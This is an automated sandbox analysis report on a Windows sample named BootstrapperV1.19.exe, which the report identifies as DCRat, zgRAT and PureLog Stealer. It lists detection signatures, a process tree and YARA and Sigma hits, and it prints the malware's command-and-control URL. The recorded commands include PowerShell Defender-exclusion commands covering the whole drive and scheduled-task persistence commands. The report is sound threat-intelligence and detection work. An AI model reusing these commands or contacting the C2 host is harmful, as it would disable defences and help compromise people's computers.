Edit tour

Windows Analysis Report
BootstrapperV1.19.exe

Overview

General Information

Sample name:	BootstrapperV1.19.exe
Analysis ID:	1511213
MD5:	c9d720a4200df5064f655adc3656056f
SHA1:	0dc179cfc3cf564ea1e9c85e012ac9bda3b40464
SHA256:	9cd19cf01e1d8c64caa0dffcd07dfb3304fc7257a1c468c0f3d4df1ad696319f
Tags:	exe
Infos:

Detection

DCRat, PureLog Stealer, zgRAT

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for URL or domain

Antivirus detection for dropped file

Found malware configuration

Multi AV Scanner detection for domain / URL

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected DCRat

Yara detected Powershell download and execute

Yara detected PureLog Stealer

Yara detected zgRAT

.NET source code contains method to dynamically call methods (often used by packers)

.NET source code contains potential unpacker

AI detected suspicious sample

Adds a directory exclusion to Windows Defender

Connects to a pastebin service (likely for C&C)

Creates processes via WMI

Loading BitLocker PowerShell Module

Machine Learning detection for dropped file

Machine Learning detection for sample

Queries sensitive Plug and Play Device Information (via WMI, Win32_PnPEntity, often done to detect virtual machines)

Sigma detected: Files With System Process Name In Unsuspected Locations

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Sigma detected: Script Interpreter Execution From Suspicious Folder

Sigma detected: Suspicious File Creation In Uncommon AppData Folder

Sigma detected: Suspicious Script Execution From Temp Folder

Sigma detected: WScript or CScript Dropper

Suspicious execution chain found

Tries to harvest and steal browser information (history, passwords, etc)

Uses schtasks.exe or at.exe to add and modify task schedules

Windows Scripting host queries suspicious COM object (likely to drop second stage)

Yara detected Generic Downloader

Allocates memory with a write watch (potentially for evading sandboxes)

Checks if the current process is being debugged

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to communicate with device drivers

Contains functionality to query CPU information (cpuid)

Contains functionality to query locales information (e.g. system language)

Contains functionality to read the PEB

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates a window with clipboard capturing capabilities

Creates files inside the system directory

Detected potential crypto function

Drops PE files

Drops PE files to the windows directory (C:\Windows)

Drops files with a non-matching file extension (content does not match file extension)

Enables debug privileges

File is packed with WinRar

Found WSH timer for Javascript or VBS script (likely evasive script)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found dropped PE file which has not been started or loaded

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

One or more processes crash

PE file contains executable resources (Code or Archives)

PE file contains sections with non-standard names

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Sigma detected: Powershell Defender Exclusion

Sigma detected: Suspicious Add Scheduled Task Parent

Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript

Uses 32bit PE files

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

System is w10x64

BootstrapperV1.19.exe (PID: 7092 cmdline: "C:\Users\user\Desktop\BootstrapperV1.19.exe" MD5: C9D720A4200DF5064F655ADC3656056F)

BootstrapperV1.19.exe (PID: 7152 cmdline: "C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exe" MD5: 90FD25CED85FE6DB28D21AE7D1F02E2C)

conhost.exe (PID: 6352 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

WerFault.exe (PID: 7048 cmdline: C:\Windows\system32\WerFault.exe -u -p 7152 -s 2180 MD5: FD27D9F6D02763BDE32511B5DF7FF7A0)

Solaraexecutor.exe (PID: 6496 cmdline: "C:\Users\user\AppData\Local\Temp\Solaraexecutor.exe" MD5: B444FEC863C995EC2C4810FC308F08C2)

wscript.exe (PID: 3260 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\5gB39wu8IXigNc9ZhKusMAzQLCwBZT1eKBOl5LOAKM0nqJLoLFIRPlM05a.vbe" MD5: FF00E0480075B095948000BDC66E81F0)

cmd.exe (PID: 4092 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\5sOqbfN.bat" " MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 1508 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

PerfNET.exe (PID: 6520 cmdline: "C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet/PerfNET.exe" MD5: 3C3B7D5864E9F151A77B33D4B9D15E3C)

schtasks.exe (PID: 5316 cmdline: schtasks.exe /create /tn "xMWILCHEwdBVCAxxjofRRLx" /sc MINUTE /mo 13 /tr "'C:\Program Files (x86)\common files\xMWILCHEwdBVCAxxjofRRL.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)

schtasks.exe (PID: 5428 cmdline: schtasks.exe /create /tn "xMWILCHEwdBVCAxxjofRRL" /sc ONLOGON /tr "'C:\Program Files (x86)\common files\xMWILCHEwdBVCAxxjofRRL.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)

schtasks.exe (PID: 6108 cmdline: schtasks.exe /create /tn "xMWILCHEwdBVCAxxjofRRL" /sc ONLOGON /tr "'C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)

powershell.exe (PID: 4296 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/' MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 3264 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 2872 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/$Recycle.Bin/' MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 7124 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

WmiPrvSE.exe (PID: 5672 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)

powershell.exe (PID: 7084 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/$WinREAgent/' MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 5460 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 4336 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Documents and Settings/' MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 3732 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 1216 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/PerfLogs/' MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 2084 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 3260 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files/' MD5: 04029E121A0CFA5991749937DD22A1D9)

powershell.exe (PID: 5316 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files (x86)/' MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 5824 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 5428 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/ProgramData/' MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 1368 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 2696 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Recovery/' MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 5300 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 6108 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/System Volume Information/' MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 6372 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 3720 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Users/' MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 6824 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 6660 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Windows/' MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 7176 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 4280 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\common files\xMWILCHEwdBVCAxxjofRRL.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 7204 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 4040 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\microsoft.net\Primary Interop Assemblies\xMWILCHEwdBVCAxxjofRRL.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 7216 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 7192 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\ELAMBKUP\SIHClient.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 7356 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 7264 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 7348 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 7308 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Default\AppData\RuntimeBroker.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 7412 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 7380 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 7500 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cmd.exe (PID: 8036 cmdline: "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\OQZC6ToBZn.bat" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 8056 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

chcp.com (PID: 8596 cmdline: chcp 65001 MD5: 33395C4732A49065EA72590B14B64F32)

w32tm.exe (PID: 9112 cmdline: w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2 MD5: 81A82132737224D324A3E8DA993E2FB5)

xMWILCHEwdBVCAxxjofRRL.exe (PID: 4128 cmdline: "C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe" MD5: 3C3B7D5864E9F151A77B33D4B9D15E3C)

conhost.exe (PID: 3696 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

PerfNET.exe (PID: 7604 cmdline: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exe MD5: 3C3B7D5864E9F151A77B33D4B9D15E3C)

PerfNET.exe (PID: 8284 cmdline: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exe MD5: 3C3B7D5864E9F151A77B33D4B9D15E3C)

xMWILCHEwdBVCAxxjofRRL.exe (PID: 8660 cmdline: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe MD5: 3C3B7D5864E9F151A77B33D4B9D15E3C)

xMWILCHEwdBVCAxxjofRRL.exe (PID: 8652 cmdline: C:\Recovery\xMWILCHEwdBVCAxxjofRRL.exe MD5: 3C3B7D5864E9F151A77B33D4B9D15E3C)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
DCRat	DCRat is a typical RAT that has been around since at least June 2019.	No Attribution	https://axmahr.github.io/posts/asyncrat-detection/ https://blog.sekoia.io/privateloader-the-loader-of-the-prevalent-ruzki-ppi-service/ https://blog.talosintelligence.com/2021/10/crimeware-targets-afghanistan-india.html https://blog.talosintelligence.com/2022/08/modernloader-delivers-multiple-stealers.html https://blogs.blackberry.com/en/2022/01/kraken-the-code-on-prometheus	https://malpedia.caad.fkie.fraunhofer.de/details/win.dcrat

Name	Description	Attribution	Blogpost URLs	Link
zgRAT	zgRAT is a Remote Access Trojan malware which sometimes drops other malware such as AgentTesla malware. zgRAT has an inforstealer use which targets browser information and cryptowallets.Usually spreads by USB or phishing emails with -zip/-lnk/.bat/.xlsx attachments and so on.	No Attribution	https://bazaar.abuse.ch/browse/signature/zgRAT/ https://kcm.trellix.com/corporate/index?page=content&id=KB96190&locale=en_US https://www.cloudsek.com/blog/threat-actors-abuse-ai-generated-youtube-videos-to-spread-stealer-malware https://www.difesaesicurezza.com/cyber/cybercrime-rfq-dalla-turchia-veicola-agenttesla-e-zgrat/ https://www.fortinet.com/blog/threat-research/smokeloader-using-old-vulnerabilities	https://malpedia.caad.fkie.fraunhofer.de/details/win.zgrat

Malware Configuration

Threatname: DCRat

{"C2 url": "http://598828cm.n9shka.top/VmPollSecureLongpollApiBasewindowsUniversal", "MUTEX": "DCR_MUTEX-BLa09nxFf1DKMOkShfe9", "Params": {"0": "{SYSTEMDRIVE}/Users/", "1": "false", "2": "false", "3": "true", "4": "true", "5": "true", "6": "true", "7": "false", "8": "true", "9": "true", "10": "true", "11": "true", "12": "true", "13": "true", "14": "true"}}

Yara Signatures

Initial Sample

Source	Rule	Description	Author	Strings
BootstrapperV1.19.exe	JoeSecurity_zgRAT_1	Yara detected zgRAT	Joe Security
BootstrapperV1.19.exe	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security

Dropped Files

Source	Rule	Description	Author
\Device\ConDrv	JoeSecurity_PowershellDownloadAndExecute	Yara detected Powershell download and execute	Joe Security
C:\Program Files (x86)\Common Files\xMWILCHEwdBVCAxxjofRRL.exe	JoeSecurity_zgRAT_1	Yara detected zgRAT	Joe Security
C:\Program Files (x86)\Common Files\xMWILCHEwdBVCAxxjofRRL.exe	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
C:\Windows\ELAMBKUP\SIHClient.exe	JoeSecurity_zgRAT_1	Yara detected zgRAT	Joe Security
C:\Windows\ELAMBKUP\SIHClient.exe	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
C:\Users\Default\AppData\RuntimeBroker.exe	JoeSecurity_zgRAT_1	Yara detected zgRAT	Joe Security
C:\Users\Default\AppData\RuntimeBroker.exe	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
C:\Users\Default\AppData\RuntimeBroker.exe	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
C:\Users\Default\AppData\RuntimeBroker.exe	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exe	JoeSecurity_zgRAT_1	Yara detected zgRAT	Joe Security
C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exe	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exe	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exe	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
C:\Users\user\AppData\Local\Temp\BootstrapperV1.19.exe	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
C:\Users\user\AppData\Local\Temp\Solaraexecutor.exe	JoeSecurity_zgRAT_1	Yara detected zgRAT	Joe Security
C:\Users\user\AppData\Local\Temp\Solaraexecutor.exe	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
Click to see the 11 entries

Memory Dumps

Source	Rule	Description	Author
0000000D.00000000.1994292109.0000000000E02000.00000002.00000001.01000000.0000000E.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
00000003.00000003.1697999893.0000000004F02000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
00000003.00000003.1698866320.0000000005017000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
00000000.00000003.1695171822.0000000003269000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
00000000.00000000.1688952530.0000000000408000.00000002.00000001.01000000.00000003.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
0000000D.00000002.2305646369.000000001348B000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
Process Memory Space: BootstrapperV1.19.exe PID: 7152	JoeSecurity_PowershellDownloadAndExecute	Yara detected Powershell download and execute	Joe Security
Process Memory Space: PerfNET.exe PID: 6520	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
Click to see the 3 entries

Unpacked PEs

Source	Rule	Description	Author
3.3.Solaraexecutor.exe.4f5070b.0.raw.unpack	JoeSecurity_zgRAT_1	Yara detected zgRAT	Joe Security
3.3.Solaraexecutor.exe.4f5070b.0.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
0.3.BootstrapperV1.19.exe.32b771a.0.raw.unpack	JoeSecurity_zgRAT_1	Yara detected zgRAT	Joe Security
0.3.BootstrapperV1.19.exe.32b771a.0.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
3.3.Solaraexecutor.exe.506570b.1.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
3.3.Solaraexecutor.exe.506570b.1.raw.unpack	JoeSecurity_zgRAT_1	Yara detected zgRAT	Joe Security
3.3.Solaraexecutor.exe.506570b.1.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
3.3.Solaraexecutor.exe.4f5070b.0.unpack	JoeSecurity_zgRAT_1	Yara detected zgRAT	Joe Security
3.3.Solaraexecutor.exe.4f5070b.0.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
0.3.BootstrapperV1.19.exe.32b771a.0.unpack	JoeSecurity_zgRAT_1	Yara detected zgRAT	Joe Security
0.3.BootstrapperV1.19.exe.32b771a.0.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
13.0.PerfNET.exe.e00000.0.unpack	JoeSecurity_zgRAT_1	Yara detected zgRAT	Joe Security
13.0.PerfNET.exe.e00000.0.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
0.0.BootstrapperV1.19.exe.54ab86.1.raw.unpack	JoeSecurity_zgRAT_1	Yara detected zgRAT	Joe Security
0.0.BootstrapperV1.19.exe.54ab86.1.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
0.0.BootstrapperV1.19.exe.54ab86.1.unpack	JoeSecurity_zgRAT_1	Yara detected zgRAT	Joe Security
0.0.BootstrapperV1.19.exe.54ab86.1.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
1.0.BootstrapperV1.19.exe.158ac680000.0.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
0.0.BootstrapperV1.19.exe.4fc494.3.raw.unpack	JoeSecurity_zgRAT_1	Yara detected zgRAT	Joe Security
0.0.BootstrapperV1.19.exe.4fc494.3.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
0.0.BootstrapperV1.19.exe.409294.2.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
0.0.BootstrapperV1.19.exe.409294.2.raw.unpack	JoeSecurity_zgRAT_1	Yara detected zgRAT	Joe Security
0.0.BootstrapperV1.19.exe.409294.2.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
0.0.BootstrapperV1.19.exe.400000.0.unpack	JoeSecurity_zgRAT_1	Yara detected zgRAT	Joe Security
0.0.BootstrapperV1.19.exe.400000.0.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
Click to see the 20 entries

Sigma Signatures

System Summary

Sigma detected: Files With System Process Name In Unsuspected Locations

Source: File created

Author: Sander Wiebing, Tim Shelton, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exe, ProcessId: 6520, TargetFilename: C:\Users\Default\AppData\RuntimeBroker.exe

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/', CommandLine: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/', CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet/PerfNET.exe", ParentImage: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exe, ParentProcessId: 6520, ParentProcessName: PerfNET.exe, ProcessCommandLine: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/', ProcessId: 4296, ProcessName: powershell.exe

Sigma detected: Script Interpreter Execution From Suspicious Folder

Source: Process started

Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\5gB39wu8IXigNc9ZhKusMAzQLCwBZT1eKBOl5LOAKM0nqJLoLFIRPlM05a.vbe" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\5gB39wu8IXigNc9ZhKusMAzQLCwBZT1eKBOl5LOAKM0nqJLoLFIRPlM05a.vbe" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\Solaraexecutor.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\Solaraexecutor.exe, ParentProcessId: 6496, ParentProcessName: Solaraexecutor.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\5gB39wu8IXigNc9ZhKusMAzQLCwBZT1eKBOl5LOAKM0nqJLoLFIRPlM05a.vbe" , ProcessId: 3260, ProcessName: wscript.exe

Sigma detected: Suspicious File Creation In Uncommon AppData Folder

Source: File created

Author: Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exe, ProcessId: 6520, TargetFilename: C:\Users\Default\AppData\RuntimeBroker.exe

Sigma detected: Suspicious Script Execution From Temp Folder

Source: Process started

Author: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\5gB39wu8IXigNc9ZhKusMAzQLCwBZT1eKBOl5LOAKM0nqJLoLFIRPlM05a.vbe" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\5gB39wu8IXigNc9ZhKusMAzQLCwBZT1eKBOl5LOAKM0nqJLoLFIRPlM05a.vbe" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\Solaraexecutor.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\Solaraexecutor.exe, ParentProcessId: 6496, ParentProcessName: Solaraexecutor.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\5gB39wu8IXigNc9ZhKusMAzQLCwBZT1eKBOl5LOAKM0nqJLoLFIRPlM05a.vbe" , ProcessId: 3260, ProcessName: wscript.exe

Sigma detected: WScript or CScript Dropper

Source: Process started

Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\5gB39wu8IXigNc9ZhKusMAzQLCwBZT1eKBOl5LOAKM0nqJLoLFIRPlM05a.vbe" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\5gB39wu8IXigNc9ZhKusMAzQLCwBZT1eKBOl5LOAKM0nqJLoLFIRPlM05a.vbe" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\Solaraexecutor.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\Solaraexecutor.exe, ParentProcessId: 6496, ParentProcessName: Solaraexecutor.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\5gB39wu8IXigNc9ZhKusMAzQLCwBZT1eKBOl5LOAKM0nqJLoLFIRPlM05a.vbe" , ProcessId: 3260, ProcessName: wscript.exe

Sigma detected: Powershell Defender Exclusion

Source: Process started

Sigma detected: Suspicious Add Scheduled Task Parent

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: schtasks.exe /create /tn "xMWILCHEwdBVCAxxjofRRLx" /sc MINUTE /mo 13 /tr "'C:\Program Files (x86)\common files\xMWILCHEwdBVCAxxjofRRL.exe'" /f, CommandLine: schtasks.exe /create /tn "xMWILCHEwdBVCAxxjofRRLx" /sc MINUTE /mo 13 /tr "'C:\Program Files (x86)\common files\xMWILCHEwdBVCAxxjofRRL.exe'" /f, CommandLine|base64offset|contains: j, Image: C:\Windows\System32\schtasks.exe, NewProcessName: C:\Windows\System32\schtasks.exe, OriginalFileName: C:\Windows\System32\schtasks.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet/PerfNET.exe", ParentImage: C:\Users\user\AppData\Local\Temp\chainbrowserReviewNet\PerfNET.exe, ParentProcessId: 6520, ParentProcessName: PerfNET.exe, ProcessCommandLine: schtasks.exe /create /tn "xMWILCHEwdBVCAxxjofRRLx" /sc MINUTE /mo 13 /tr "'C:\Program Files (x86)\common files\xMWILCHEwdBVCAxxjofRRL.exe'" /f, ProcessId: 5316, ProcessName: schtasks.exe

Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript

Source: Process started

